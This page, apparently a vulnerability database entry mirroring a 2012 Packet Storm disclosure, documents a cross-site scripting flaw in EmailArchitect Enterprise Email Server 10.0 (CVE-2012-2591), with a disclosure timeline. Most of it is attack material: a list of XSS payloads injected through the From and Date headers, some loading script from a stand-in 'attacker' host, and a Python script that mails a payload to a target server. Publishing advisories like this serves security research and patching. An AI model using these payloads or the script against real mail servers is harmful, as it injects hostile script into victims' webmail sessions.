Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLoneferretPACKETSTORM:115354
HistoryAug 08, 2012 - 12:00 a.m.

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

2012-08-0800:00:00
loneferret
packetstormsecurity.com
12

0.007 Low

EPSS

Percentile

79.5%

JSON
`#!/usr/bin/python  
  
'''  
Author: loneferret of Offensive Security  
Product: EmailArchitect Enterprise Email Server  
Version: 10.0  
Vendor Site: http://www.emailarchitect.net  
Software Download Link: http://www.emailarchitect.net/webapp/download/easetup.exe  
  
Timeline:  
29 May 2012: Vulnerability reported to CERT  
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012  
23 Jul 2012: Update from CERT: No response from vendor  
08 Aug 2012: Public Disclosure  
  
Installed On: Windows Server 2003 SP2  
Client Test OS: Window 7 Pro SP1 (x86), OS: MAC OS Lion  
Browser Used: Internet Explorer 9, Firefox 12  
  
Injection Point: From  
Injection Payload(s):  
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}  
  
Injection Point: Date  
Injection Payload(s):  
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}  
2: <SCRIPT>alert('XSS')</SCRIPT>  
3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>  
4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>  
5: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>  
6: </TITLE><SCRIPT>alert("XSS");</SCRIPT>  
7: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>  
8: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>  
  
'''  
  
  
import smtplib, urllib2  
  
payload = """<SCRIPT SRC=http://attacker/xss.js></SCRIPT>"""  
  
def sendMail(dstemail, frmemail, smtpsrv, username, password):  
msg = "From: [email protected]\n"  
msg += "To: [email protected]\n"  
msg += "Date: Today" + payload + "\r\n"  
msg += "Subject: XSS\n"  
msg += "Content-type: text/html\n\n"  
msg += "XSS.\r\n\r\n"  
server = smtplib.SMTP(smtpsrv)  
server.login(username,password)  
try:  
server.sendmail(frmemail, dstemail, msg)  
except Exception, e:  
print "[-] Failed to send email:"  
print "[*] " + str(e)  
server.quit()  
  
username = "[email protected]"  
password = "123456"  
dstemail = "[email protected]"  
frmemail = "[email protected]"  
smtpsrv = "172.16.84.171"  
  
print "[*] Sending Email"  
sendMail(dstemail, frmemail, smtpsrv, username, password)  
  
  
`

Related

cve 1
nvd 1
cvelist 1
prion 1
cve
cve
CVE-2012-2591
2014-06-20 14:55:06
nvd
nvd
CVE-2012-2591
2014-06-20 14:55:06
cvelist
cvelist
CVE-2012-2591
2014-06-20 14:00:00
prion
prion
Cross site scripting
2014-06-20 14:55:00

0.007 Low

EPSS

Percentile

79.5%

JSON
Related for PACKETSTORM:115354
cve1nvd1cvelist1prion1